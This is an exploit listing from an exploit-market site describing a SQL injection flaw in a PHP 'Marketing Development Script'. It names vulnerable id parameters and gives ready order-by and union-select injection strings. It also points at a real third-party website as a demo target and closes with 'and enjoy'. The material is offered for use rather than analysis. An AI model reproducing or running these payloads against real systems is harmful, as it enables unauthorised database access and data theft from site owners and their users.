[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Marketing Development Script SQL Injection Vulnerability

Author
3spi0n
Risk
[
Security Risk High
]
0day-ID
0day-ID-19879
Category
web applications
Date add
04-12-2012
Platform
php
# Exploit Title; Marketing Development Script SQL Injection Vulnerability
# Date; 3/12/12
# Author; 3spi0n
# Script Vendor or Software Link; http://www.marketingdev.com/
# Category; Webapps
# Type; SQL Injection [MySQLi]
# Tested on; Ubuntu 12.10 / Win7 / Backtrack 5

[#] Demo Analyzing ;

http://www.feralpitriathlon.it/gazzettino_articolo.php?id=90' [MySQLi Vuln.]

[#] Vulnerable Details ;

- MySQLi Vulnerable on sites

[#] Vulnerable Files ;

gazzettino_articolo.php?id= [query, variant of gazzettino_articolo.php file]
album.php?id= [query, variant of album.php file]
atleta.php?id= [query, variant of atleta.php file]

[#] Exploit ;

Order by command = gazzettino_articolo.php?id=4+order+by+8
Union Select command =
/gazzettino_articolo.php?id=4+union+select+1,2,3,4,5,6,7

and enjoy.


[#] Greetz ;

- Grayhatz Corporation
- My Official Blog, www.Ryuzaki.in
- Facebook.Com/3spi0ne - Twitter.Com/bariiiscan

#  0day.today [2024-07-07]  #